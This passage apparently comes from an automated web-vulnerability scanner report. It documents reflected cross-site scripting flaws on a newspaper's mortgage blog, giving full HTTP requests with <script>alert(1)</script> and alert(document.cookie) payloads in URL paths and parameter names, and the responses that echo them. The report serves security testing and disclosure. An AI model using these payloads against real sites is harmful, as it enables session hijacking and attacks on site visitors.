HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:51 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62651
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20116be24\"><script>alert(1)</script>6d101414c29/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2022c"><script>alert(1)</script>df2f3673541 was submitted in the REST URL parameter 2. This input was echoed as 2022c\"><script>alert(1)</script>df2f3673541 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/022022c"><script>alert(1)</script>df2f3673541/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:57 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:57 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/022022c\"><script>alert(1)</script>df2f3673541/feed/" /> ...[SNIP]...
1.377. http://mortgage.ocregister.com/2011/02/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2011/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be6d4"><script>alert(1)</script>10654d20381 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be6d4\"><script>alert(1)</script>10654d20381 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/?be6d4"><script>alert(1)</script>10654d20381=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:08:44 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 68451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2011 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/?be6d4\"><script>alert(1)</script>10654d20381=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848f3"><script>alert(1)</script>73c38926bd3 was submitted in the REST URL parameter 5. This input was echoed as 848f3\"><script>alert(1)</script>73c38926bd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668848f3"><script>alert(1)</script>73c38926bd3/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:12 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668848f3\"><script>alert(1)</script>73c38926bd3/feed/" /> ...[SNIP]...
1.379. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 231b3"><script>alert(1)</script>bb110f17cc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 231b3\"><script>alert(1)</script>bb110f17cc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/?231b3"><script>alert(1)</script>bb110f17cc5=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:08:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41668>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... title=" Predatory lending suit settles for $6.5 million - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/?231b3\"><script>alert(1)</script>bb110f17cc5=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00fb"><script>alert(1)</script>98a4af95827 was submitted in the REST URL parameter 1. This input was echoed as b00fb\"><script>alert(1)</script>98a4af95827 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b00fb"><script>alert(1)</script>98a4af95827?t=1759807488 HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:02:08 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:02:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/b00fb\"><script>alert(1)</script>98a4af95827?t=1759807488feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c3"><script>alert(1)</script>30983565075 was submitted in the REST URL parameter 1. This input was echoed as 9a6c3\"><script>alert(1)</script>30983565075 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css9a6c3"><script>alert(1)</script>30983565075/print.css HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:02:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:02:12 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/css9a6c3\"><script>alert(1)</script>30983565075/print.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6883"><script>alert(1)</script>aee79722e35 was submitted in the REST URL parameter 2. This input was echoed as c6883\"><script>alert(1)</script>aee79722e35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/print.cssc6883"><script>alert(1)</script>aee79722e35 HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:02:21 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:02:22 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62649
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/css/print.cssc6883\"><script>alert(1)</script>aee79722e35feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71cd"><script>alert(1)</script>1f35e8c0ea2 was submitted in the REST URL parameter 1. This input was echoed as a71cd\"><script>alert(1)</script>1f35e8c0ea2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd"><script>alert(1)</script>1f35e8c0ea2/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 16:23:25 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 16:23:26 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd\"><script>alert(1)</script>1f35e8c0ea2/feed/" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:07:56 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:17 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" /> ...[SNIP]...
1.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/feeda71cd%2522%253E%253Cscript%253Ealert(1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:13 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62689
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" /> ...[SNIP]...
1.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:46 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:20 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" /> ...[SNIP]...
1.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/files
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
